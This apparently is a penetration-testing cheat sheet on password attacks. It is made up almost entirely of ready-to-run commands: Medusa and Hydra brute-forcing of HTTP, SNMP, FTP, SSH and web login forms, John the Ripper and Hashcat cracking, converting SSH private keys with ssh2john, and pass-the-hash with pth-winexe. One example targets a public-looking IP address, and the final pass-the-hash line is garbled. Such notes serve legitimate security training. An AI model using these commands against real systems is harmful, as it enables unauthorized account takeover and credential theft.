# Password attacks

#### `usr/share/wordlists`

### Medusa

Brute force basic http authorizations.

```
medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10
```

### Hydra

Can be used to brute force numerous services.

```
hydra -P password.txt -v 10.11.1.210 snmp
hydra -l admin -P password.txt -v 122.168.31.219 ftp
hydra -l root -P password.txt 10.11.1.219 ssh
hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin
```

#### \*\* Brute force http-post login forms

```
Format: hydra -L <path to user wordlist> -P <path to password wordlist> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>"

Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
```

### John the Ripper

```
john <hash.txt> --wordlist=/usr/share/wordlists/rockyou.txt
```

#### SSH keys

To crack SSH key passwords convert the key to a hash, then crack using John.

```
python ssh2john.py id_rsa > id_rsa.hash
```

### Hashcat

**Check for mode on wiki page**  <https://hashcat.net/wiki/doku.php?id=example_hashes>

```
hashcat -m (mode) -a 0 hash.txt Pass.txt
```

### Passing the hash (Windows)

Create environment variable SMBHASH, containing hash we want to pass

`export SMBHASH=hashvalue`

`Use pth-winexe to authenticate: pth-winexe -U administrator% //10.11.0.1.76.cmd`